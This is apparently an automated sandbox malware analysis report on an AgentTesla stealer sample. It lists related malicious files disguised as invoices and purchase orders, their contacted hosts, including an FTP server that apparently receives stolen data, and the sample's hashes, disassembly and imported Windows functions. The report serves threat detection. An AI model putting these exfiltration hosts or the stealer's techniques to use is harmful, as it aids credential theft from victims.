                                  • ip-api.com/line/?fields=hosting
                                  3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  195.252.110.253J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                          2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comRHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      ftp.jeepcommerce.rsJ8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 195.252.110.253
                                                      doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 195.252.110.253
                                                      2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      b83NG35487.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      [Purchase Order] PO2411024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      INV & BANK DETAILS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      PO#150003191.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TUT-ASUSRHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      BEOTEL-AShttpwwwbeotelnetRSJ8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 195.252.110.253
                                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                                      • 194.106.175.134
                                                      DEMONS.arm.elfGet hashmaliciousUnknownBrowse
                                                      • 62.108.98.189
                                                      doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      bot.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 62.108.98.135
                                                      bot.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 62.108.98.187
                                                      jade.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 62.108.98.145
                                                      R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 195.252.110.253
                                                      2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 195.252.110.253
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\Q5QrxfKnFA.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):147182
                                                      Entropy (8bit):7.926225098776317
                                                      Encrypted:false
                                                      SSDEEP:3072:y+aHb/Ac51PUUJnR6/l5+3t2R7k5AgmKKsfCzr5UsRg7zR3zPGkN:y+eb/AczUUbmM3QRo5A+DKzTONDGU
                                                      MD5:0F70A286C9AAEA2E9C004FE98A599C90
                                                      SHA1:D5F3C9EEB43AAAB06DD7559F400AD587848038FB
                                                      SHA-256:BF823BC29B5A067DBC87E2F4D2C74BB6B6998DC6169B90F42CFF0E115B82C79E
                                                      SHA-512:1B897CCDB2BE4842CB39DAC6AA4D3986664AE306C57B6F362EB233BE88AF8ED318477A13C051C05BD56A24D2DC13291A78A1F32941178805DD1E96D747E3791B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:EA06......tt...1...mO.eF...U.....U........0......+.|........+...Nk.h..i)..+5.4..$..1....$..R.lN...]k.....[..,@.y....h..cF...S@..v&TJ..Z..p.j5....&.mU..@.....<..1P..F.T.%.1...J.C...)qD.E..*5NgJ....j5Z..[....s~*MF....k......g...H...f...@...X.t...om.y|....\..P.@......0...#U.I..J].J..E......V.O...-$..........U)......U...T..[..N&P@.O.G...j.hp.y0.Q.pnl...Q.....C...<?....?>....p.C.....e....<z...!...ZH..)$.Oj]....K.ov.~..S.........P..L.nA..T..G7..Zj...n]...f.=.{{.........U.3..../....;.~....,..v.Ay.Qaq...E...e..$.%..-.Y..@...;...+..ep..7..Z.F....j.r.K.....~..`y....(..$@.d.....i..."X..V......F.....$T....x.p..N..E@?...>.Q{.m.bM...Wn.>..h>......n.,...7..7.....Q..*.w7F.B.:...a.._.4k<.ov.G.5y..A.S.S.D.=......1..f.en....<....s.......A..ki....Lj.`.Sq..o...WcU.q.!...k..].V...M.U....%....).a3.\,.(.Nu#.K@p.9.Qh.Z.d...Q/.Y..i..`.Z..WS.U..lB.3.K.`.%..V.D..........j5rWZ.Q.....kU.....q2.L/t...QP..W.D.1.-b.y..b.bD....[..*.h..Q9.n(Q...U....y...W5.K...6.U
                                                      Process:C:\Users\user\Desktop\Q5QrxfKnFA.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):245248
                                                      Entropy (8bit):6.528553200092722
                                                      Encrypted:false
                                                      SSDEEP:6144:1nZYQ0kDkSbcZkmcOKtFqs6J+BAEZpzGWJoLnHb/pedDmuDcIU4:1HgcPtQJ+BhZpzhAnHb/U0c
                                                      MD5:53379CF9A3EC90E2842AAAD958EB3324
                                                      SHA1:F2D4D8544C26C5926C9DEB438F09C8CE276412A2
                                                      SHA-256:B1010604D70A41EB17782FF6C4575C5DC44CD4740084C136091A31B9C09AA658
                                                      SHA-512:E359BC264726F7235A3A1FFF892A34D97BD77E15E5FF3D1CFDB08E15E82BF113E64CBFE88176E75BC2E0A3E45FCCA284450E3AFA2C141F1CFB4569A5B57DF38B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...JR5U1QFFV..2F.3JQ5U1U.FVV82FC3JQ5U1UFFVV82FC3JQ5U1UFFVV82.C3J_*.?U.O.w.3....9\&.%4)1$Y_f R$?Z!.7#f$#V./-...fu\:"#x[58bC3JQ5U1..FV.91F...45U1UFFVV.2DB8KZ5U.VFF^V82FC3d.6U1uFFV.;2FCsJQ.U1UDFVR82FC3JQ1U1UFFVV8.BC3HQ5U1UFDV..2FS3JA5U1UVFVF82FC3JA5U1UFFVV82F..IQfU1UF.UV~7FC3JQ5U1UFFVV82FC3JQ1U=UFFVV82FC3JQ5U1UFFVV82FC3JQ5U1UFFVV82FC3JQ5U1UFFVV82fC3BQ5U1UFFVV82Nc3J.5U1UFFVV82FmG/)AU1Ur.UV8.FC3.R5U3UFFVV82FC3JQ5U.UF&x$K@%C3J.0U1U.EVV>2FC.IQ5U1UFFVV82FCsJQu{C0*)5V8>FC3JQ1U1WFFV.;2FC3JQ5U1UFFV.82.C3JQ5U1UFFVV82FC#.R5U1UF.VV80FF3..7U.`GFUV82GC3LQ5U1UFFVV82FC3JQ5U1UFFVV82FC3JQ5U1UFFVV82FC3JQ5U,...p..>.@32...!.U..!..J..:.$.=R.stK.....rDS..V.7....C... .NS/9....iU^@[..!y7S.^....h.!...PV.<.../.._Sb...``..yZE....".%,^d0E%]0h.70Y@/.1.P5U1U........Z2.ox2ZXrD.n...~CM....(V82"C3J#5U14FFV.82F,3JQ[U1U8FVVF2FCuJQ5.1UFqVV8.FC3'Q5U.UFF(V82.><E..X&.VV82Fv..a.8.....a..uB./n7....2.s..F`.^].F.....6..(..Fg>7v..QW>6CA4NR9h?....w:6BF1MU6Y.[......`..s...@....,.NFC3JQ5.1U.FVV..F.3JQ.U.U..VV8..C.J.5..F
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.0256483148304785
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Q5QrxfKnFA.exe
                                                      File size:1'073'664 bytes
                                                      MD5:f3dc9b8005c8237c3ad3a186af2a6ade
                                                      SHA1:c7a53f05a6c630787fbde778ac6e882f0e7a1e34
                                                      SHA256:bc3bb7cdc4c87d2888c0c64f15f9953a79da7baa2d31874dd168db28f2b79256
                                                      SHA512:9923d3ab52dcd94188b2d7423c78dc9829db12b3d9c5e6599060f22c18b70aa3223d722ae38d4ce5ee2dafb64314f00f22d23fcfc24c2aaa3faceb5f3c64314c
                                                      SSDEEP:24576:mu6J33O0c+JY5UZ+XC0kGso6Fa2qLCT7MPWY:ou0c++OCvkGs9Fa2qiY
                                                      TLSH:0035BE2273DDC360CB669173BF29B7056EBF3C614630B85B2F980D7DA960162162D7A3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x674E48C1 [Mon Dec 2 23:54:41 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                      Instruction
                                                      call 00007FA8CCD7C8FAh
                                                      jmp 00007FA8CCD6F6C4h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FA8CCD6F84Ah
                                                      cmp edi, eax
                                                      jc 00007FA8CCD6FBAEh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007FA8CCD6F849h
                                                      rep movsb
                                                      jmp 00007FA8CCD6FB5Ch
                                                      cmp ecx, 00000080h
                                                      jc 00007FA8CCD6FA14h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FA8CCD6F850h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007FA8CCD6FD20h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007FA8CCD6F9EDh
                                                      test edi, 00000003h
                                                      jne 00007FA8CCD6F9FEh
                                                      test esi, 00000003h
                                                      jne 00007FA8CCD6F9DDh
                                                      bt edi, 02h
                                                      jnc 00007FA8CCD6F84Fh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FA8CCD6F853h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FA8CCD6F8A5h
                                                      bt esi, 03h
                                                      jnc 00007FA8CCD6F8F8h
                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x3d970.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1050000x711c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc70000x3d9700x3da00e85f0fd9e3fe3027f6445ad9c057037bFalse0.8936081706389453data7.810970006181469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1050000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcf7b80x34c37data1.0003516581142797
                                                      RT_GROUP_ICON0x1043f00x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x1044680x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x10447c0x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x1044900x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x1044a40xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x1045800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
